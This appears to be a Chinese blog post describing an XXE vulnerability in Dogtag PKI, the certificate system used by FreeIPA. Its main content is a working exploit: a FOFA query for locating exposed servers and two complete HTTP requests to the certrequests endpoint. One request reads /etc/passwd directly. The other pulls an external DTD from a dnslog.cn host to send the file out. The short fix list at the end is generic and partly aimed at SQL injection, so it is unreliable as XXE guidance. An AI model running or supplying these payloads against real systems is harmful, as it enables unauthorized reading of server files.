赞
踩
Dogtag PKI XML实体注入漏洞
2022年7月29,Dogtag PKI 的XML解析器爆出安全漏洞,该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 (XXE) 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。CVSS3.X严重性指标为7.5(高)。
Dogtag PKI
FOFA语法:title=“Identity Management” && body="FreeIPA
POST /ca/rest/certrequests HTTP/1.1
Host: localhost
Content-Type: application/xml
Content-Length: 192
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>
POST /ca/rest/certrequests HTTP/1.1
Host: localhost
Content-Type: application/xml
Content-Length: 192
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY % d SYSTEM "http://8mamls.dnslog.cn/a.dtd">%d;]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&abc;</ProfileID>
</CertEnrollmentRequest>
#a.dtd的内容为:<!ENTITY abc SYSTEM "file:///etc/passwd">
#XXE注入漏洞学习模范:https://blog.csdn.net/m0_51683653/article/details/127588896
修复建议:
1.对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定。
2.当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式。
3.对以上标签进行危险字符过滤,禁止('、"、+、%、&、<>、()、;、and、select等)特殊字符的传入。
在代码级输出时对XML特殊字符(“<”、“>”、“>]]”)进行转义。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。